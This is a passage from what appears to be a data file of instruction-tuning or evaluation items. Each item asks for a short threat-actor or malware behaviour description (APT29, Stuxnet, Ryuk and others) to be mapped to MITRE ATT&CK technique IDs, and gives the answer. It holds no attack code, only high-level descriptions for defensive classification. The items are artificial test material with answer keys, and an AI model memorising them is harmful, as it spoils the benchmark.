T1074.001: Data Staged - Local Data Staging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Patchwork copied all targeted files to a directory called index that was eventually uploaded to the C&C server.", + "output": "- T1074.001: Data Staged - Local Data Staging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Prikormka creates a directory, \"\"%USERPROFILE%\\AppData\\Local\\SKC\\\"\", which is used to store collected log files.\"", + "output": "- T1074.001: Data Staged - Local Data Staging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "SUGARDUMP has stored collected data under `%%\\\\CrashLog.txt`.", + "output": "- T1074.001: Data Staged - Local Data Staging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "ccf32 can temporarily store files in a hidden directory on the local host.", + "output": "- T1074.001: Data Staged - Local Data Staging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "FIN8 aggregates staged data from a network into a single location.", + "output": "- T1074.002: Data Staged - Remote Data Staging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "UNC2452 staged data and files in password-protected archives on a victim's OWA server.", + "output": "- T1074.002: Data Staged - Remote Data Staging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT18 actors leverage legitimate credentials to log into external remote services.", + "output": "- T1133: External Remote Services\n- T1078: Valid Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "During Night Dragon, threat actors used compromised VPN accounts to gain access to victim systems.", + "output": "- T1133: External Remote Services\n- T1078: Valid Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Industroyer can use supplied user credentials to execute processes and stop services.", + "output": "- T1078: Valid Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Kinsing has used valid SSH credentials to access remote hosts.", + "output": "- T1078: Valid Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Some SeaDuke samples have a module to extract email from Microsoft Exchange servers using compromised credentials.", + "output": "- T1078: Valid Accounts\n- T1114.002: Email Collection - Remote Email Collection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "TEMP.Veles has used compromised VPN accounts.", + "output": "- T1078: Valid Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "HyperStack can use default credentials to connect to IPC$ shares on remote machines.", + "output": "- T1078.001: Valid Accounts - Default Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Stuxnet infected WinCC machines via a hardcoded database server password.", + "output": "- T1078.001: Valid Accounts - Default Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT29 has used valid accounts, including administrator accounts, to help facilitate lateral movement on compromised networks.", + "output": "- T1078.002: Valid Accounts - Domain Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Chimera has used compromised domain accounts to gain access to the target environment.", + "output": "- T1078.002: Valid Accounts - Domain Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "CreepySnail can use stolen credentials to authenticate on target networks.", + "output": "- T1078.002: Valid Accounts - Domain Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "During Night Dragon, threat actors used domain accounts to gain further access to victim systems.", + "output": "- T1078.002: Valid Accounts - Domain Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "During Operation CuckooBees, the threat actors used compromised domain administrator credentials as part of their lateral movement.", + "output": "- T1078.002: Valid Accounts - Domain Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "If Shamoon cannot access shares using current privileges, it attempts access using hard coded, domain-specific credentials gathered earlier in the intrusion.", + "output": "- T1078.002: Valid Accounts - Domain Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Naikon has used administrator credentials for lateral movement in compromised networks.", + "output": "- T1078.002: Valid Accounts - Domain Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Sandworm Team has used stolen credentials to access administrative accounts within the domain.", + "output": "- T1078.002: Valid Accounts - Domain Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Stuxnet attempts to access network resources with a domain account\u2019s credentials.", + "output": "- T1078.002: Valid Accounts - Domain Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Threat Group-1314 actors used compromised domain credentials for the victim's endpoint management platform, Altiris, to move laterally.", + "output": "- T1078.002: Valid Accounts - Domain Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Wizard Spider has used administrative accounts, including Domain Admin, to move laterally within a victim network.", + "output": "- T1078.002: Valid Accounts - Domain Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT29 has used compromised local accounts to access victims' networks.", + "output": "- T1078.003: Valid Accounts - Local Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT32 has used legitimate local admin account credentials.", + "output": "- T1078.003: Valid Accounts - Local Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Emotet can brute force a local admin password, then use it to facilitate lateral movement.", + "output": "- T1078.003: Valid Accounts - Local Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Kimsuky has used a tool called GREASE to add a Windows admin account in order to allow them continued access via RDP.", + "output": "- T1078.003: Valid Accounts - Local Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"NotPetya can use valid credentials with PsExec or \"\"wmic\"\" to spread itself to remote systems.\"", + "output": "- T1078.003: Valid Accounts - Local Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PROMETHIUM has created admin accounts on a compromised host.", + "output": "- T1078.003: Valid Accounts - Local Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Stolen Pencil has a tool to add a Windows admin account in order to allow them to ensure continued access via RDP.", + "output": "- T1078.003: Valid Accounts - Local Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Tropic Trooper has used known administrator account credentials to execute the backdoor directly.", + "output": "- T1078.003: Valid Accounts - Local Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT28 has used compromised Office 365 service accounts with Global Administrator privileges to collect email from user inboxes.", + "output": "- T1078.004: Valid Accounts - Cloud Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT33 has used compromised Office 365 accounts in tandem with Ruler in an attempt to gain control of endpoints.", + "output": "- T1078.004: Valid Accounts - Cloud Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Ke3chang has used compromised credentials to sign into victims\u2019 Microsoft 365 accounts.", + "output": "- T1078.004: Valid Accounts - Cloud Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Peirates can use stolen service account tokens to perform its operations.", + "output": "- T1078.004: Valid Accounts - Cloud Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "H1N1 has functionality to copy itself to network shares.", + "output": "- T1080: Taint Shared Content" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"APT28 has enumerated installed applications on macOS devices with built-in utilities such as \"\"ls -al /Applications\"\".\"", + "output": "- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "CaddyWiper can use `DsRoleGetPrimaryDomainInformation` to determine the role of the infected machine. CaddyWiper can also halt execution if the compromised host is identified as a domain controller.", + "output": "- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "DropBook has checked for the presence of Arabic language in the infected machine's settings.", + "output": "- T1082: System Information Discovery\n- T1614.001: System Location Discovery - System Language Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "HELLOKITTY can enumerate logical drives on a target system.", + "output": "- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "KGH_SPY can collect drive information from a compromised host.", + "output": "- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "LoudMiner has monitored CPU usage.", + "output": "- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Nebulae can discover logical drive information including the drive type, free space, and volume information.", + "output": "- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Ryuk has called \"\"GetLogicalDrives\"\" to emumerate all mounted drives, and \"\"GetDriveTypeW\"\" to determine the drive type.\"", + "output": "- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"XAgentOSX contains the getInstalledAPP function to run \"\"ls -la /Applications\"\" to gather what applications are installed.\"", + "output": "- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Zox can enumerate attached drives.", + "output": "- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Amadey has searched for folders associated with antivirus software.", + "output": "- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "BoxCaon has searched for files on the system, such as documents located in the desktop folder.", + "output": "- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"GoldenSpy has included a program \"\"ExeProtector\"\", which monitors for the existence of GoldenSpy on the infected system and redownloads if necessary.\"", + "output": "- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "GravityRAT collects the volumes mapped on the system, and also steals files with the following extensions: .docx, .doc, .pptx, .ppt, .xlsx, .xls, .rtf, and .pdf.", + "output": "- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of 